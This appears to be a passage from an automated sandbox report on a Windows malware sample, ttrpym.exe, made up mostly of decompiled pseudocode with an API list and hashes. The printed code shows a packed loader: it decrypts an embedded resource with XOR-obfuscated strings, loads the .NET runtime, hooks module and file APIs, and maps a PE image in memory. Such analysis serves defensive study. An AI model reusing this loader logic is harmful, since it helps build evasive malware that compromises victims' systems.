                                                                                                                        					_v145 = 0xf4;
                                                                                                                        					_v144 = 0xb5;
                                                                                                                        					_v143 = 0x87;
                                                                                                                        					_v142 = 0x7b;
                                                                                                                        					_v141 = 0xf;
                                                                                                                        					_v140 = 0xf4;
                                                                                                                        					_v139 = 0x76;
                                                                                                                        					_v138 = 0xb9;
                                                                                                                        					_v137 = 0x34;
                                                                                                                        					_v136 = 0xbf;
                                                                                                                        					_v135 = 0x1e;
                                                                                                                        					_v134 = 0xe7;
                                                                                                                        					_v133 = 0x78;
                                                                                                                        					_v132 = 0x98;
                                                                                                                        					_v131 = 0xe9;
                                                                                                                        					_v130 = 0x6f;
                                                                                                                        					_v129 = 0xb4;
                                                                                                                        					_v128 = 0;
                                                                                                                        					_v124 = FindResourceA(_v800, E00402AB0( &_v160,  &_v2280), 0xa);
                                                                                                                        					_v1004 = LoadResource(_v800, _v124);
                                                                                                                        					_v84 = LockResource(_v1004);
                                                                                                                        					_v988 = 0;
                                                                                                                        					_t534 = E0040DFE9(_t643, _v800, _t772, SizeofResource(_v800, _v124)); // executed
                                                                                                                        					_v988 = _t534;
                                                                                                                        					_v2632 = 0x40022;
                                                                                                                        					_push(_v2632); // executed
                                                                                                                        					_t536 = E0040E9C8(_t643, _v800, _t772, __eflags); // executed
                                                                                                                        					_t787 = _t784 + 0x10;
                                                                                                                        					_v2636 = _t536;
                                                                                                                        					__eflags = _v2636;
                                                                                                                        					if(_v2636 == 0) {
                                                                                                                        						_v3172 = 0;
                                                                                                                        					} else {
                                                                                                                        						E0040E430(_t772, _v2636, 0, _v2632);
                                                                                                                        						_t787 = _t787 + 0xc;
                                                                                                                        						_v3172 = _v2636;
                                                                                                                        					}
                                                                                                                        					_v760 = _v3172;
                                                                                                                        					E00402760(_v760);
                                                                                                                        					_t716 = _v124;
                                                                                                                        					_v120 = SizeofResource(_v800, _t716);
                                                                                                                        					_v2284 = 0;
                                                                                                                        					while(1) {
                                                                                                                        						asm("cdq");
                                                                                                                        						__eflags = _v2284 - _v120 + (_t716 & 0x000003ff) >> 0xa;
                                                                                                                        						if(_v2284 >= _v120 + (_t716 & 0x000003ff) >> 0xa) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t716 = _v988 + (_v2284 << 0xa);
                                                                                                                        						_push(_t716);
                                                                                                                        						_push(0x400);
                                                                                                                        						_push((_v2284 << 0xa) + _v84);
                                                                                                                        						E004029C0(_t643, _v760);
                                                                                                                        						_t696 = _v2284 + 1;
                                                                                                                        						__eflags = _t696;
                                                                                                                        						_v2284 = _t696;
                                                                                                                        					}
                                                                                                                        					_t651 = _v120 & 0x800003ff;
                                                                                                                        					__eflags = _t651;
                                                                                                                        					if(_t651 < 0) {
                                                                                                                        						_t651 = (_t651 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        						__eflags = _t651;
                                                                                                                        					}
                                                                                                                        					__eflags = _t651;
                                                                                                                        					if(_t651 > 0) {
                                                                                                                        						_t745 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t745;
                                                                                                                        						if(_t745 < 0) {
                                                                                                                        							_t745 = (_t745 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t745;
                                                                                                                        						}
                                                                                                                        						_push(_v120 - _t745 + _v988);
                                                                                                                        						_t688 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t688;
                                                                                                                        						if(_t688 < 0) {
                                                                                                                        							_t688 = (_t688 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t688;
                                                                                                                        						}
                                                                                                                        						_push(_t688);
                                                                                                                        						_t747 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t747;
                                                                                                                        						if(_t747 < 0) {
                                                                                                                        							_t747 = (_t747 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t747;
                                                                                                                        						}
                                                                                                                        						_t610 = _v120 - _t747 + _v84;
                                                                                                                        						__eflags = _t610;
                                                                                                                        						_push(_t610);
                                                                                                                        						E004029C0(_t643, _v760);
                                                                                                                        					}
                                                                                                                        					E0040E430(_t772, _v84, 0, _v120);
                                                                                                                        					FreeResource(_v1004);
                                                                                                                        					_v80 = 0;
                                                                                                                        					_v984 = _v988->i;
                                                                                                                        					_v188 = _v984;
                                                                                                                        					_t547 = E0040DFE9(_t643, _v988->i, _t772, _v188); // executed
                                                                                                                        					_v80 = _t547;
                                                                                                                        					_v1676 = E0040DE30(_v80,  &_v188, _v988 + 4, SizeofResource(_v800, _v124));
                                                                                                                        					_v1048 = _v80;
                                                                                                                        					E0040E430(_t772, _v988, 0, _v120);
                                                                                                                        					_v168 = 0x105;
                                                                                                                        					_push(_v1048);
                                                                                                                        					_v180 = E00405550();
                                                                                                                        					E0040E430(_t772, _v1048, 0, _v188);
                                                                                                                        					_push(_v80);
                                                                                                                        					E0040E815(_t643, _t772, _t779, __eflags);
                                                                                                                        					 *0x4237b4 = _v180;
                                                                                                                        					_v1000 = _v180;
                                                                                                                        					_v2248 =  *((intOrPtr*)(_v1000 + 0x3c)) + _v1000;
                                                                                                                        					_v228 =  *((intOrPtr*)(_v2248 + 0xe8));
                                                                                                                        					_v996 = _v1000 + _v228;
                                                                                                                        					_v1716 =  *((intOrPtr*)(_v996 + 8));
                                                                                                                        					_v992 = _v1000 + _v1716;
                                                                                                                        					_v164 = _v992 + 0x10;
                                                                                                                        					_v1672 = 0xce;
                                                                                                                        					_v1671 = 0x27;
                                                                                                                        					_v1670 = 0x9c;
                                                                                                                        					_v1669 = 0x1a;
                                                                                                                        					_v1668 = 0x95;
                                                                                                                        					_v1667 = 0x21;
                                                                                                                        					_v1666 = 0x2e;
                                                                                                                        					_v1665 = 0xd;
                                                                                                                        					_v1664 = 0xdb;
                                                                                                                        					_v1663 = 0x29;
                                                                                                                        					_v1662 = 0x57;
                                                                                                                        					_v1661 = 0x56;
                                                                                                                        					_v1660 = 0xf8;
                                                                                                                        					_v1659 = 0x98;
                                                                                                                        					_v1658 = 0x5b;
                                                                                                                        					_v1657 = 0xf4;
                                                                                                                        					_v1656 = 0xb5;
                                                                                                                        					_v1655 = 0x87;
                                                                                                                        					_v1654 = 0x7b;
                                                                                                                        					_v1653 = 0xf;
                                                                                                                        					_v1652 = 0xf4;
                                                                                                                        					_v1651 = 0x76;
                                                                                                                        					_v1650 = 0xb9;
                                                                                                                        					_v1649 = 0x34;
                                                                                                                        					_v1648 = 0xbf;
                                                                                                                        					_v1647 = 0x1e;
                                                                                                                        					_v1646 = 0xe7;
                                                                                                                        					_v1645 = 0x78;
                                                                                                                        					_v1644 = 0x98;
                                                                                                                        					_v1643 = 0xe9;
                                                                                                                        					_v1642 = 0x6f;
                                                                                                                        					_v1641 = 0xb4;
                                                                                                                        					_v1640 = 0;
                                                                                                                        					_v1008 = LoadLibraryA(E00402AB0( &_v1672,  &_v1040));
                                                                                                                        					_v224 = 0xe0;
                                                                                                                        					_v223 = 0x18;
                                                                                                                        					_v222 = 0xad;
                                                                                                                        					_v221 = 0x36;
                                                                                                                        					_v220 = 0x95;
                                                                                                                        					_v219 = 0x21;
                                                                                                                        					_v218 = 0x2a;
                                                                                                                        					_v217 = 0x57;
                                                                                                                        					_v216 = 0xda;
                                                                                                                        					_v215 = 0xc;
                                                                                                                        					_v214 = 0x55;
                                                                                                                        					_v213 = 0x25;
                                                                                                                        					_v212 = 0x8c;
                                                                                                                        					_v211 = 0xf9;
                                                                                                                        					_v210 = 0x35;
                                                                                                                        					_v209 = 0x97;
                                                                                                                        					_v208 = 0xd0;
                                                                                                                        					_v207 = 0x87;
                                                                                                                        					_v206 = 0x7b;
                                                                                                                        					_v205 = 0xf;
                                                                                                                        					_v204 = 0xf4;
                                                                                                                        					_v203 = 0x76;
                                                                                                                        					_v202 = 0xb9;
                                                                                                                        					_v201 = 0x34;
                                                                                                                        					_v200 = 0xbf;
                                                                                                                        					_v199 = 0x1e;
                                                                                                                        					_v198 = 0xe7;
                                                                                                                        					_v197 = 0x78;
                                                                                                                        					_v196 = 0x98;
                                                                                                                        					_v195 = 0xe9;
                                                                                                                        					_v194 = 0x6f;
                                                                                                                        					_v193 = 0xb4;
                                                                                                                        					_v192 = 0;
                                                                                                                        					_t566 = E00402AB0( &_v224,  &_v792);
                                                                                                                        					_t796 = _t787 + 0x50;
                                                                                                                        					 *0x4236a8 = GetProcAddress(_v1008, _t566);
                                                                                                                        					__eflags =  *0x4236a8;
                                                                                                                        					_v977 = 0 |  *0x4236a8 != 0x00000000;
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_v181 =  ~(_v977 & 0x000000ff) + 1;
                                                                                                                        					__eflags = _v977 & 0x000000ff;
                                                                                                                        					if((_v977 & 0x000000ff) == 0) {
                                                                                                                        						_v181 = 1;
                                                                                                                        						goto L72;
                                                                                                                        					} else {
                                                                                                                        						_v2288 = 0;
                                                                                                                        						_t592 =  *0x4236a8(0x41b220, 0x41b210,  &_v2288); // executed
                                                                                                                        						_v1044 = _t592;
                                                                                                                        						__eflags = _v1044;
                                                                                                                        						if(_v1044 < 0) {
                                                                                                                        							_v181 = 1;
                                                                                                                        						}
                                                                                                                        						__eflags = _v181 & 0x000000ff;
                                                                                                                        						if((_v181 & 0x000000ff) != 0) {
                                                                                                                        							L70:
                                                                                                                        							L72:
                                                                                                                        							__eflags = _v181 & 0x000000ff;
                                                                                                                        							if((_v181 & 0x000000ff) == 0) {
                                                                                                                        								L78:
                                                                                                                        								 *0x423184 =  &_v2244;
                                                                                                                        								_t668 =  *0x423184; // 0xf3f310
                                                                                                                        								E00402F20( &_v940, _t668);
                                                                                                                        								 *0x423180 = E00402C40( &_v940);
                                                                                                                        								GetModuleFileNameA(0, "C:\Users\frontdesk\Desktop\ttrpym.exe", 0x105);
                                                                                                                        								GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\ttrpym.exe", 0x105);
								E00401410("kernel32.dll", "GetModuleFileNameW", E004011C0, 0x4237c0);
								E00401410("kernel32.dll", "GetModuleFileNameA", E00401190, 0x4237bc);
								E00401410("kernel32.dll", "GetModuleHandleW", E00401150, 0x4237cc);
								E00401410("kernel32.dll", "GetModuleHandleA", E00401170, 0x4237c8);
								E00401410("kernel32.dll", "CreateFileA", 0x401050, 0x4237c4);
								E00401410("kernel32.dll", "CreateFileW", E004010D0, 0x4237d0);
								_v176 =  *((intOrPtr*)(_v2248 + 0x28)) + _v1000;
								goto _v176;
							}
							_v181 = 0;
							_v2624 = 0xe4;
							_v2623 = 0x31;
							_v2622 = 0x8b;
							_v2621 = 0x36;
							_v2620 = 0xa8;
							_v2619 = 0x16;
							_v2618 = 0x18;
							_v2617 = 0x5a;
							_v2616 = 0xcc;
							_v2615 = 0x31;
							_v2614 = 0x5e;
							_v2613 = 0x3b;
							_v2612 = 0xbc;
							_v2611 = 0xf1;
							_v2610 = 0x29;
							_v2609 = 0x91;
							_v2608 = 0xd6;
							_v2607 = 0xf3;
							_v2606 = 0x14;
							_v2605 = 0x7d;
							_v2604 = 0x8d;
							_v2603 = 0x76;
							_v2602 = 0xb9;
							_v2601 = 0x34;
							_v2600 = 0xbf;
							_v2599 = 0x1e;
							_v2598 = 0xe7;
							_v2597 = 0x78;
							_v2596 = 0x98;
							_v2595 = 0xe9;
							_v2594 = 0x6f;
							_v2593 = 0xb4;
							_v2592 = 0;
							_t584 = E00402AB0( &_v2624,  &_v2588);
							_t796 = _t796 + 8;
							 *0x4237b8 = GetProcAddress(_v1008, _t584);
							_v2628 =  *0x4237b8( &_v2244, 0x104,  &_v796);
							__eflags = _v2628;
							if(_v2628 != 0) {
								_v181 = 1;
								goto L78;
							}
							_t589 =  &_v2244 + 0xfffffffe;
							__eflags = _t589;
							_v3184 = _t589;
							do {
								_v3186 =  *((intOrPtr*)(_v3184 + 2));
								_v3184 = _v3184 + 2;
								__eflags = _v3186;
							} while (_v3186 != 0);
							memcpy(_v3184, L"mscorlib.dll", 6 << 2);
							_t796 = _t796 + 0xc;
							asm("movsw");
							goto L78;
						} else {
							_v2292 = 0;
							E00402F00( &_v2556, _v164);
							_t597 =  *((intOrPtr*)( *((intOrPtr*)( *_v2288 + 0xc))))(_v2288, E00402C40( &_v2556), 0x41b230,  &_v2292); // executed
							_v1044 = _t597;
							__eflags = _v1044;
							if(_v1044 < 0) {
								_v181 = 1;
							}
							__eflags = _v181 & 0x000000ff;
							if((_v181 & 0x000000ff) != 0) {
								L69:
								E00402D70( &_v2556);
								goto L70;
							}
							_v1044 =  *((intOrPtr*)( *((intOrPtr*)( *_v2292 + 0x10))))(_v2292,  &_v2244,  &_v168);
							__eflags = _v1044;
							if(_v1044 >= 0) {
								_t603 =  &_v2244 + 0xfffffffe;
								__eflags = _t603;
								_v3176 = _t603;
								do {
									_v3178 =  *((intOrPtr*)(_v3176 + 2));
									_v3176 = _v3176 + 2;
									__eflags = _v3178;
								} while (_v3178 != 0);
								memcpy(_v3176, L"mscorlib.dll", 6 << 2);
								_t796 = _t796 + 0xc;
								asm("movsw");
								goto L69;
							}
							_v181 = 1;
							goto L69;
						}
					}
				}
				_t618 = E00402AB0( &_v976,  &_v1080);
				_t803 = _t784 + 8;
				_v3092 = _t618;
				_v3096 =  &_v1604;
				while(1) {
					_t699 = _v3096;
					_t756 = _t699->i;
					_v3097 = _t756;
					if(_t756 !=  *_v3092) {
						break;
					}
					if(_v3097 == 0) {
						L7:
						_v3104 = 0;
						L9:
						_v3108 = _v3104;
						if(_v3108 != 0) {
							_t621 = E00402AB0( &_v1712,  &_v116);
							_t784 = _t803 + 8;
							_v3112 = _t621;
							_v3116 =  &_v1604;
							while(1) {
								_t701 = _v3116;
								_t759 = _t701->i;
								_v3117 = _t759;
								__eflags = _t759 -  *_v3112;
								if(_t759 !=  *_v3112) {
									break;
								}
								__eflags = _v3117;
								if(_v3117 == 0) {
									L16:
									_v3124 = 0;
									L18:
									_v3128 = _v3124;
									__eflags = _v3128;
									if(_v3128 != 0) {
										while(1) {
											L20:
											_t624 = Module32Next(_v172,  &_v1636);
											__eflags = _t624;
											if(_t624 == 0) {
												goto L40;
											}
											_t626 = E00402AB0( &_v976,  &_v1080);
											_t804 = _t784 + 8;
											_v3132 = _t626;
											_v3136 =  &_v1604;
											while(1) {
												_t627 = _v3136;
												_t704 = _t627->i;
												_v3137 = _t704;
												__eflags = _t704 -  *_v3132;
												if(_t704 !=  *_v3132) {
													break;
												}
												__eflags = _v3137;
												if(_v3137 == 0) {
													L26:
													_v3144 = 0;
													L28:
													_v3148 = _v3144;
													__eflags = _v3148;
													if(_v3148 != 0) {
														_t629 = E00402AB0( &_v1712,  &_v116);
														_t784 = _t804 + 8;
														_v3152 = _t629;
														_v3156 =  &_v1604;
														while(1) {
															_t630 = _v3156;
															_t707 = _t630->i;
															_v3157 = _t707;
															__eflags = _t707 -  *_v3152;
															if(_t707 !=  *_v3152) {
																break;
															}
															__eflags = _v3157;
															if(_v3157 == 0) {
																L35:
																_v3164 = 0;
																L37:
																_v3168 = _v3164;
																__eflags = _v3168;
																if(_v3168 != 0) {
																	goto L20;
																}
																CloseHandle(_v172);
																return 0;
															}
															_t630 = _v3156;
															_t709 = _t630->i;
															_v3158 = _t709;
															_t767 = _v3152;
															__eflags = _t709 -  *((intOrPtr*)(_t767 + 1));
															if(_t709 !=  *((intOrPtr*)(_t767 + 1))) {
																break;
															}
															_v3156 =  &(_v3156->i);
															_v3152 = _v3152 + 2;
															__eflags = _v3158;
															if(_v3158 != 0) {
																continue;
															}
															goto L35;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														_v3164 = _t630;
														goto L37;
													}
													CloseHandle(_v172);
													return 0;
												}
												_t627 = _v3136;
												_t710 = _t627->i;
												_v3138 = _t710;
												_t769 = _v3132;
												__eflags = _t710 -  *((intOrPtr*)(_t769 + 1));
												if(_t710 !=  *((intOrPtr*)(_t769 + 1))) {
													break;
												}
												_v3136 =  &(_v3136->i);
												_v3132 = _v3132 + 2;
												__eflags = _v3138;
												if(_v3138 != 0) {
													continue;
												}
												goto L26;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											_v3144 = _t627;
											goto L28;
										}
										goto L40;
									}
									CloseHandle(_v172);
									return 0;
								}
								_t701 = _v3116;
								_t770 = _t701->i;
								_v3118 = _t770;
								_t638 = _v3112;
								__eflags = _t770 -  *((intOrPtr*)(_t638 + 1));
                                                                                                                        								if(_t770 !=  *((intOrPtr*)(_t638 + 1))) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_v3116 =  &(_v3116->i);
                                                                                                                        								_v3112 = _v3112 + 2;
                                                                                                                        								__eflags = _v3118;
                                                                                                                        								if(_v3118 != 0) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								goto L16;
                                                                                                                        							}
                                                                                                                        							asm("sbb ecx, ecx");
                                                                                                                        							asm("sbb ecx, 0xffffffff");
                                                                                                                        							_v3124 = _t701;
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        						CloseHandle(_v172);
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        					_t699 = _v3096;
                                                                                                                        					_t771 = _t699->i;
                                                                                                                        					_v3098 = _t771;
                                                                                                                        					if(_t771 !=  *((intOrPtr*)(_v3092 + 1))) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_v3096 =  &(_v3096->i);
                                                                                                                        					_v3092 = _v3092 + 2;
                                                                                                                        					if(_v3098 != 0) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				asm("sbb ecx, 0xffffffff");
                                                                                                                        				_v3104 = _t699;
                                                                                                                        				goto L9;
                                                                                                                        			}
                                                                                                                        0x00401cab
                                                                                                                        0x00401cb7
                                                                                                                        0x00401cbb
                                                                                                                        0x00401cbb
                                                                                                                        0x00401cc1
                                                                                                                        0x00401cca
                                                                                                                        0x00401cca
                                                                                                                        0x00401cca
                                                                                                                        0x00401ccb
                                                                                                                        0x00401ccf
                                                                                                                        0x00401ccf
                                                                                                                        0x00401cd5
                                                                                                                        0x00401cde
                                                                                                                        0x00401cde
                                                                                                                        0x00401cde
                                                                                                                        0x00401ce4
                                                                                                                        0x00401ce4
                                                                                                                        0x00401ce7
                                                                                                                        0x00401cee
                                                                                                                        0x00401cee
                                                                                                                        0x00401cfd
                                                                                                                        0x00401d0c
                                                                                                                        0x00401d12
                                                                                                                        0x00401d21
                                                                                                                        0x00401d2d
                                                                                                                        0x00401d3a
                                                                                                                        0x00401d42
                                                                                                                        0x00401d74
                                                                                                                        0x00401d7d
                                                                                                                        0x00401d90
                                                                                                                        0x00401d98
                                                                                                                        0x00401da8
                                                                                                                        0x00401db1
                                                                                                                        0x00401dc7
                                                                                                                        0x00401dd2
                                                                                                                        0x00401dd3
                                                                                                                        0x00401de1
                                                                                                                        0x00401ded
                                                                                                                        0x00401e02
                                                                                                                        0x00401e14
                                                                                                                        0x00401e26
                                                                                                                        0x00401e35
                                                                                                                        0x00401e47
                                                                                                                        0x00401e56
                                                                                                                        0x00401e5c
                                                                                                                        0x00401e63
                                                                                                                        0x00401e6a
                                                                                                                        0x00401e71
                                                                                                                        0x00401e78
                                                                                                                        0x00401e7f
                                                                                                                        0x00401e86
                                                                                                                        0x00401e8d
                                                                                                                        0x00401e94
                                                                                                                        0x00401e9b
                                                                                                                        0x00401ea2
                                                                                                                        0x00401ea9
                                                                                                                        0x00401eb0
                                                                                                                        0x00401eb7
                                                                                                                        0x00401ebe
                                                                                                                        0x00401ec5
                                                                                                                        0x00401ecc
                                                                                                                        0x00401ed3
                                                                                                                        0x00401eda
                                                                                                                        0x00401ee1
                                                                                                                        0x00401ee8
                                                                                                                        0x00401eef
                                                                                                                        0x00401ef6
                                                                                                                        0x00401efd
                                                                                                                        0x00401f04
                                                                                                                        0x00401f0b
                                                                                                                        0x00401f12
                                                                                                                        0x00401f19
                                                                                                                        0x00401f20
                                                                                                                        0x00401f27
                                                                                                                        0x00401f2e
                                                                                                                        0x00401f35
                                                                                                                        0x00401f3c
                                                                                                                        0x00401f60
                                                                                                                        0x00401f66
                                                                                                                        0x00401f6d
                                                                                                                        0x00401f74
                                                                                                                        0x00401f7b
                                                                                                                        0x00401f82
                                                                                                                        0x00401f89
                                                                                                                        0x00401f90
                                                                                                                        0x00401f97
                                                                                                                        0x00401f9e
                                                                                                                        0x00401fa5
                                                                                                                        0x00401fac
                                                                                                                        0x00401fb3
                                                                                                                        0x00401fba
                                                                                                                        0x00401fc1
                                                                                                                        0x00401fc8
                                                                                                                        0x00401fcf
                                                                                                                        0x00401fd6
                                                                                                                        0x00401fdd
                                                                                                                        0x00401fe4
                                                                                                                        0x00401feb
                                                                                                                        0x00401ff2
                                                                                                                        0x00401ff9
                                                                                                                        0x00402000
                                                                                                                        0x00402007
                                                                                                                        0x0040200e
                                                                                                                        0x00402015
                                                                                                                        0x0040201c
                                                                                                                        0x00402023
                                                                                                                        0x0040202a
                                                                                                                        0x00402031
                                                                                                                        0x00402038
                                                                                                                        0x0040203f
                                                                                                                        0x00402046
                                                                                                                        0x0040205b
                                                                                                                        0x00402060
                                                                                                                        0x00402071
                                                                                                                        0x00402078
                                                                                                                        0x00402082
                                                                                                                        0x00402091
                                                                                                                        0x00402096
                                                                                                                        0x004020a3
                                                                                                                        0x004020a5
                                                                                                                        0x004021e6
                                                                                                                        0x00000000
                                                                                                                        0x004020ab
                                                                                                                        0x004020ab
                                                                                                                        0x004020c6
                                                                                                                        0x004020cc
                                                                                                                        0x004020d2
                                                                                                                        0x004020d9
                                                                                                                        0x004020db
                                                                                                                        0x004020db
                                                                                                                        0x004020e9
                                                                                                                        0x004020eb
                                                                                                                        0x004021e4
                                                                                                                        0x004021ed
                                                                                                                        0x004021f4
                                                                                                                        0x004021f6
                                                                                                                        0x00402389
                                                                                                                        0x0040238f
                                                                                                                        0x00402394
                                                                                                                        0x004023a1
                                                                                                                        0x004023b1
                                                                                                                        0x004023c2
                                                                                                                        0x004023d4
                                                                                                                        0x004023ee
                                                                                                                        0x0040240a
                                                                                                                        0x00402426
                                                                                                                        0x00402442
                                                                                                                        0x0040245e
                                                                                                                        0x0040247a
                                                                                                                        0x00402491
                                                                                                                        0x00402497
                                                                                                                        0x00402497
                                                                                                                        0x004021fc
                                                                                                                        0x00402203
                                                                                                                        0x0040220a
                                                                                                                        0x00402211
                                                                                                                        0x00402218
                                                                                                                        0x0040221f
                                                                                                                        0x00402226
                                                                                                                        0x0040222d
                                                                                                                        0x00402234
                                                                                                                        0x0040223b
                                                                                                                        0x00402242
                                                                                                                        0x00402249
                                                                                                                        0x00402250
                                                                                                                        0x00402257
                                                                                                                        0x0040225e
                                                                                                                        0x00402265
                                                                                                                        0x0040226c
                                                                                                                        0x00402273
                                                                                                                        0x0040227a
                                                                                                                        0x00402281
                                                                                                                        0x00402288
                                                                                                                        0x0040228f
                                                                                                                        0x00402296
                                                                                                                        0x0040229d
                                                                                                                        0x004022a4
                                                                                                                        0x004022ab
                                                                                                                        0x004022b2
                                                                                                                        0x004022b9
                                                                                                                        0x004022c0
                                                                                                                        0x004022c7
                                                                                                                        0x004022ce
                                                                                                                        0x004022d5
                                                                                                                        0x004022dc
                                                                                                                        0x004022e3
                                                                                                                        0x004022f8
                                                                                                                        0x004022fd
                                                                                                                        0x0040230e
                                                                                                                        0x0040232c
                                                                                                                        0x00402332
                                                                                                                        0x00402339
                                                                                                                        0x00402382
                                                                                                                        0x00000000
                                                                                                                        0x00402382
                                                                                                                        0x00402341
                                                                                                                        0x00402341
                                                                                                                        0x00402344
                                                                                                                        0x0040234a
                                                                                                                        0x00402354
                                                                                                                        0x0040235b
                                                                                                                        0x00402362
                                                                                                                        0x00402362
                                                                                                                        0x0040237c
                                                                                                                        0x0040237c
                                                                                                                        0x0040237e
                                                                                                                        0x00000000
                                                                                                                        0x004020f1
                                                                                                                        0x004020f1
                                                                                                                        0x00402108
                                                                                                                        0x00402137
                                                                                                                        0x00402139
                                                                                                                        0x0040213f

                                                                                                                        APIs
                                                                                                                        • _getenv.LIBCMT ref: 00401510
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401528
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401531
                                                                                                                        • Module32First.KERNEL32 ref: 00401722
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000224), ref: 004017DC
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000224), ref: 00401893
                                                                                                                        • Module32Next.KERNEL32 ref: 004018AE
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000224,?,?,?,00000224,?,?,?,00000224), ref: 00401968
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000224,?,?,?,00000224), ref: 00401A1F
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,?,00000224), ref: 00401A38
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401A40
                                                                                                                        • FindResourceA.KERNEL32(?,00000000), ref: 00401B44
                                                                                                                        • LoadResource.KERNEL32(?,?,?,0000000A), ref: 00401B58
                                                                                                                        • LockResource.KERNEL32(?,?,0000000A), ref: 00401B6B
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,0000000A), ref: 00401B89
                                                                                                                        • _malloc.LIBCMT ref: 00401B90
                                                                                                                        • _memset.LIBCMT ref: 00401BD6
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,?,?,0000000A), ref: 00401C18
                                                                                                                        • _memset.LIBCMT ref: 00401CFD
                                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,0000000A), ref: 00401D0C
                                                                                                                        • _malloc.LIBCMT ref: 00401D3A
                                                                                                                        • SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,0000000A), ref: 00401D50
                                                                                                                        • _memset.LIBCMT ref: 00401D90
                                                                                                                        • _memset.LIBCMT ref: 00401DC7
                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00401F5A
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0040206B
                                                                                                                        • CLRCreateInstance.MSCOREE(0041B220,0041B210,00000000), ref: 004020C6
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00402308
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ttrpym.exe,00000105,00F3F310), ref: 004023C2
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ttrpym.exe,00000105), ref: 004023D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CloseHandle$_memset$ModuleSizeof$AddressCreateFileFindLoadModule32NameProc_malloc$ChangeCurrentFirstFreeInstanceLibraryLockNextNotificationProcessSnapshotToolhelp32_getenv
                                                                                                                        • String ID: $!$!$!$"$"$#$%$'$'$)$)$)$*$*$*$*$.$.$0$0x1$1$1$4$4$4$4$4$4$4$5$6$6$8$:$;$;$;$;$=$A$C:\Users\user\Desktop\ttrpym.exe$C:\Users\user\Desktop\ttrpym.exe$CreateFileA$CreateFileW$D$E$G$GetModuleFileNameA$GetModuleFileNameW$GetModuleHandleA$GetModuleHandleW$K$U$V$V$V$W$W$W$W$Z$[$[$[$[$^$d$e$h$kernel32.dll$mscorlib.dll$o$o$o$o$o$o$o$u$v$v$v$v$v$v$v$x$x$x$x$x$x$x${${${${${$}
                                                                                                                        • API String ID: 2763807530-3225119994
                                                                                                                        • Opcode ID: a8f5b03e2d61490cadb47c56cafddab60a2bcf30eb458a7b2d2c2c11d65f2d90
                                                                                                                        • Instruction ID: 4dc773f5e7fee98e6a1e02012dd27a22f7e849ff88423fd6f728a9c658178ef0
                                                                                                                        • Opcode Fuzzy Hash: a8f5b03e2d61490cadb47c56cafddab60a2bcf30eb458a7b2d2c2c11d65f2d90
                                                                                                                        • Instruction Fuzzy Hash: 4EA25B609083E98EDB32CB688C48BDDBBB56B56314F0443D9E098762D2C7791BC5CF66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 83%
                                                                                                                        			E00405550() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t27;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t43;
                                                                                                                        				void* _t47;
                                                                                                                        				intOrPtr* _t60;
                                                                                                                        				intOrPtr* _t66;
                                                                                                                        				intOrPtr* _t69;
                                                                                                                        				void* _t70;
                                                                                                                        				void* _t71;
                                                                                                                        
                                                                                                                        				_t69 =  *((intOrPtr*)(_t70 + 8));
                                                                                                                        				if( *_t69 == 0x5a4d) {
                                                                                                                        					_t2 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        					_t60 =  *_t2 + _t69;
                                                                                                                        					if( *_t60 == 0x4550) {
                                                                                                                        						_t22 = VirtualAlloc( *(_t60 + 0x34),  *(_t60 + 0x50), 0x2000, 4); // executed
                                                                                                                        						_t47 = _t22;
                                                                                                                        						if(_t47 != 0) {
                                                                                                                        							L6:
                                                                                                                        							_t66 = HeapAlloc(GetProcessHeap(), 0, 0x14);
                                                                                                                        							 *(_t66 + 4) = _t47;
                                                                                                                        							 *((intOrPtr*)(_t66 + 0xc)) = 0;
